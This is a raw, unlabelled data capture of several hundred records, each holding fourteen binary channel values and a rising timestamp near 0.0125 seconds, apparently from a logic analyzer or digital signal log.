1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2534416e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2534440e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2534468e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2534492e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2534540e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2534564e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2534616e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2534640e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2534692e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2534716e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2534740e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2534764e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2534788e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2534816e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2534840e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2534868e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2534892e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2534916e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2534940e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2534964e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2534988e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2535016e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2535040e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2535068e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2535092e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2535116e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2535140e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2535164e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2535188e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2535216e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.2535220e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,1.2535240e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.2535268e-02 1,1,1,1,0,1,0,0,0,0,0,0,0,0,1.2535272e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2535276e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2535292e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2535316e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.2535320e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,1.2535364e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.2535388e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2535396e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2535416e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2535440e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2535468e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2535492e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2535516e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2535540e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2535564e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2535588e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2535644e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2535668e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2535716e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2535740e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2535792e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2535816e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2535868e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2535892e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2535916e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2535940e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2535964e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2535988e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2536044e-02 1,1,1,1,0,0,0,0,0,1,0,0,0,0,1.2536068e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.2536072e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,1.2536116e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.2536140e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2536148e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2536192e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2536216e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2536268e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2536292e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2536316e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2536340e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2536364e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2536388e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2536416e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2536440e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2536468e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2536488e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2536516e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2536540e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2536564e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2536588e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2536612e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2536636e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2536668e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2536688e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2536716e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2536740e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2536764e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2536788e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2536812e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2536836e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2536888e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2536916e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2536964e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2536988e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2537036e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2537068e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2537116e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2537140e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2537164e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2537188e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2537212e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2537236e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2537268e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2537288e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2537340e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2537364e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2537424e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2537448e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2537500e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2537524e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2537576e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2537596e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2537624e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2537648e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2537676e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2537700e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2537724e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2537748e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2537776e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2537796e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2537824e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2537848e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2537876e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2537900e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2537924e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2537948e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2537976e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2537996e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2538024e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2538048e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2538076e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2538100e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2538124e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2538148e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2538176e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2538196e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2538224e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2538248e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2538276e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2538300e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2538324e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2538348e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2538376e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2538396e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2538424e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2538448e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2538476e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2538500e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2538524e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2538548e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2538576e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2538596e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2538624e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2538648e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2538676e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2538700e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2538724e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2538748e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2538776e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2538796e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2538824e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2538852e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2538876e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2538900e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2538924e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2538948e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2538976e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2539000e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2539028e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2539052e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2539076e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2539100e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2539124e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2539148e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2539176e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2539200e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.2539204e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,1,1.2663260e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,1,1.2663448e-02 0,0,0,0,0,1,0,0,0,1,0,0,0,1,1.2663452e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,1.2663468e-02 0,0,0,0,1,1,0,0,0,1,0,1,0,1,1.2663492e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,1.2663516e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,1,1.2663828e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,1.2663852e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,1.2663860e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,1.2663876e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,1.2663900e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,1.2663924e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,1.2663948e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,1.2663976e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,1.2664000e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,1.2664028e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,1.2664052e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,1.2664076e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2664092e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2664100e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2664124e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2664148e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2664180e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2664200e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2664228e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2664252e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2664276e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2664300e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2664308e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2664352e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2664380e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2664384e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2664404e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2664428e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2664452e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2664476e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2664504e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2664524e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2664580e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2664604e-02 0,0,0,0,1,0,0,0,0,1,0,0,0,0,1.2664608e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2664612e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2664628e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2664652e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2664676e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2664704e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2664728e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2664756e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2664780e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2664804e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2664812e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2664852e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2664876e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2664904e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2664928e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2664932e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2664980e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2665004e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2665012e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2665052e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2665076e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2665084e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2665104e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2665128e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2665156e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2665180e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2665204e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2665228e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2665236e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2665280e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2665304e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2665328e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2665356e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2665380e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2665404e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2665452e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2665476e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2665500e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2665524e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2665548e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2665576e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2665580e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2665600e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2665628e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2665652e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2665676e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2665700e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2665724e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2665748e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2665776e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2665800e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2665828e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2665876e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2665900e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2665908e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2665952e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2665976e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2665984e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2666028e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2666052e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2666076e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2666100e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2666124e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2666148e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2666156e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2666204e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2666228e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2666236e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2666276e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2666300e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2666308e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2666324e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2666348e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2666376e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2666400e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2666428e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2666452e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2666460e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2666500e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2666524e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2666552e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2666576e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2666600e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2666628e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2666652e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2666676e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2666700e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2666724e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2666748e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2666776e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2666800e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2666828e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2666852e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2666876e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2666900e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2666924e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2666948e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2666976e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2667000e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2667028e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2667052e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2667076e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2667080e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2667124e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2667152e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2667156e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2667176e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2667196e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2667228e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2667252e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2667276e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2667300e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2667352e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2667376e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2667380e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2667404e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2667428e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2667452e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2667476e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2667500e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2667524e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2667548e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2667576e-02 0,0,0,0,1,1,0,0,0,0,0,0,0,0,1.2667580e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2667584e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2667628e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2667652e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2667676e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2667700e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2667708e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2667724e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2667748e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2667804e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2667828e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2667852e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2667876e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2667900e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2667924e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2667932e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2667948e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2667976e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2668000e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2668028e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2668052e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2668076e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2668100e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2668124e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2668148e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2668176e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2668200e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2668228e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2668252e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2668276e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2668300e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2668324e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2668348e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2668376e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2668400e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2668428e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2668476e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2668500e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2668508e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2668524e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2668548e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2668576e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2668600e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2668628e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2668652e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2668676e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2668700e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2668708e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2668752e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2668776e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2668804e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2668828e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.2668876e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.2668900e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2668908e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2668924e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2668948e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2668976e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2669000e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2669028e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2669052e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2669076e-02 